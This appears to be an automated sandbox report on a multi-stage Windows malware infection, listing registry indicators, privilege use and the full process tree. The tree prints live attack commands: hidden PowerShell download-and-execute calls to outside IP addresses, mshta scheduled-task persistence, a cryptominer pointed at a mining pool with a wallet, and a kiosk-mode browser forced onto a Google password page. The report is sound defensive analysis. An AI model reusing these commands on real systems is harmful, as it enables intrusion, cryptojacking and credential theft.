| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe
"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"
C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
"C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.cmdline"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FE0.tmp" "c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\CSCA8772FE477F3431A8E4EB01FFA7070FE.TMP"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE
"C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "1bVtkmaEFba" /tr "mshta \"C:\Temp\4buU3vPam.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\4buU3vPam.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe
"C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4784 -ip 4784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 820
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\ProgramData\rjbum\abfjdu.exe
C:\ProgramData\rjbum\abfjdu.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe
"C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe
"C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe
"C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe
"C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe"
C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe
"C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe"
C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe
"C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1916 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3219f9b-7f74-406f-9bf8-d68635766d42} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01c09d46-e774-4e15-ae93-1616266d2440} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3184 -childID 1 -isForBrowser -prefsHandle 1436 -prefMapHandle 2628 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4f67990-34d8-4010-9f43-2286c1a1ceb5} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4120 -childID 2 -isForBrowser -prefsHandle 4112 -prefMapHandle 4108 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3dc32dc-7c8f-4fd4-a5d9-9af212b745cc} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4880 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4872 -prefMapHandle 4868 -prefsLen 32854 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa3abcb1-6eae-4a53-95b8-d1042466a2de} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5212 -childID 3 -isForBrowser -prefsHandle 4696 -prefMapHandle 5180 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c5ed142-abae-401c-8b7c-ee583ef0bbd4} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {653f8cec-3367-4821-af54-fec38fe8fcf9} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 5 -isForBrowser -prefsHandle 5628 -prefMapHandle 5624 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b22b891f-18d5-4a40-acaf-52150da83d07} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe
"C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\92EF.tmp\92F0.tmp\92F1.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwm4ybui\jwm4ybui.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD5B.tmp" "c:\Users\Admin\AppData\Local\Temp\jwm4ybui\CSCD9F6A0106DC94F429C6CF68E69297485.TMP"
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4300 -ip 4300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 800
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
